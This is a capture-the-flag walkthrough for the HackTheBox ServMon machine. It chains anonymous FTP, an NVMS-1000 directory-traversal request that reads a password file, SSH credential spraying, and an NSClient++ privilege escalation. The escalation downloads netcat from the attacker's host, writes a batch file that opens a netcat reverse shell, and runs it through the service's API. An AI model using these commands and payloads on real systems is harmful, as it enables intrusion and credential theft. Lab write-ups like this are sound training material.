HackTheBox - ServMon | Walkthrough
As always, let's start with an nmap scan:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.184 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -A -p$ports 10.10.10.184 -o nmap
We see quite a few ports open.
Let's check with the ftp first, as anonymous login is enabled.
ftp 10.10.10.184 #login as anonymous
ftp> ls
01-18-20 12:05PM <DIR> Users
ftp> ls Users
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
ftp> ls Users/Nadine
01-18-20 12:08PM 174 Confidential.txt
ftp> ls Users/Nathan
01-18-20 12:10PM 186 Notes to do.txt
ftp>
So, we have a few very interesting files here. Let's get them.
ftp> cd Users/Nadine/
ftp> get Confidential.txt
ftp> cd ../Nathan/
ftp> get Notes\ to\ do.txt
Now, let's check if we have write permissions here.
ftp> mkdir test
550 Access is denied.
ftp>
So, it seems like we don't have write permission here. Let's check the files that we downloaded.
root@kali:~/hackthebox/servmon# cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
So, there is a Passwords.txt file in Nathan's Desktop.
Now, let's check the other file:
root@kali:~/hackthebox/servmon# cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Okay, let's check what else do we have here.
Let's try to curl the website.
root@kali:~/hackthebox/servmon# curl http://10.10.10.184/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<script type="text/javascript">
window.location.href = "Pages/login.htm";
</script>
</head>
<body>
</body>
</html>
It seeems pretty simple, its using JS to redirect us, let's use Firefox to check it out.
Opening the website with Firefox, we see that we are taken to a login page, and the title of the page is, "NVMS-1000".
Interesting.
Let's look if we have a publicly available exploit for it!
searchsploit NVMS
So, we have one, Directory Traversal.
cp /usr/share/exploitdb/exploits/hardware/webapps/47774.txt .
root@kali:~/hackthebox/servmon# cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Let's fire up burp and try the directory traversal.
Catch a request being sent to the server, and send it to repeater.
Now, sending this request:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
We get the following response:
HTTP/1.1 200 OK
Content-type:
Content-Length: 92
Connection: close
AuthInfo:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Nice, now let's try the Passwords.txt file in Nathan's Desktop.
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Now, let's save these passwords in a file.
User
vi pass.txt
And, then paste it in.
Now, let's make another file of the usernames that we know.
vi users.txt
Nadine
Nathan
Administrator
Now, let's try spray these credentials on SSH.
msfconsole
use auxiliary/scanner/ssh/ssh_login
options
set rhosts 10.10.10.184
set user_file users.txt
set pass_file pass.txt
run
Nice, we get a hit!
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk'
Easy.
Now, let's exit Metasploit and login with ssh.
ssh Nadine@10.10.10.184
#Now enter the password L1k3B1gBut7s@W0rk
Look! We get a shell! Beautiful!
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
Nice, now you can go get the user.txt file.
I'll load up powershell as I prefer working in it than in a normal shell.
Administrator
nadine@SERVMON C:\Users\Nadine>powershell.exe -ExecutionPolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Nadine>
PS C:\Users\Nadine> whoami /all
Okay, now let's try getting some information about the system.
PS C:\Users\Nadine> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
ERROR: Access denied
PS C:\Users\Nadine>
Yikes, okay. That's disallowed, too.
Going back the notes of Nathan, we see that he talks about NSClient. Let's see what that is and if we have an exploit for it.
searchsploit nsclient
Nice, we do have an exploit! And guess what? It is for Privilege Escalation. Nice.
cp /usr/share/exploitdb/exploits/windows/local/46802.txt .
Now, in our victim machine:
cd "C:\Program Files\NSClient++"
type .\nsclient.ini
Here you should see:
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
Nice, now we have the password.
Also, CheckExternalScripts and Scheduler already seem to be enabled.
Now, let's download netcat.
cd C:\Temp\
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/nc.exe','C:\Temp\nc.exe')"
Now, we need a bat file to use netcat to send us a reverse shell. For that, in your Kali machine make a new file:
vi evil.bat
@echo off
C:\Temp\nc.exe 10.10.14.78 4444 -e cmd.exe
Now, let's download this file.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/evil.bat','C:\Temp\abhizer.bat')"
Now, because only 127.0.0.1 is an allowed host, we can forward the port.
But, before that, le'ts try curling it.
curl https://127.0.0.1:8443/
We get an error, its because curl is set as some kind of an alias in PowerShell. I don't like that, so let's remove it.
Remove-Item alias:curl
curl https://127.0.0.1:8443/
Now when we try to curl it, we get that the certificate is untrusted. Which is fine.
Let's forward that port. Quit the current ssh session and then:
ssh Nadine@10.10.10.184 -L 8443:127.0.0.1:8443
Now, from your local machine:
curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/abhizer.bat --data-binary @evil.bat
Added abhizer as scripts\abhizer.bat
Now, let's set up a ssh listener first:
nc -nvlp 4444
And, now call the script:
curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:8443/api/v1/queries/abhizer/commands/execute?time=1s"
You should have a reverse shell as Administrator now!
Congratulations!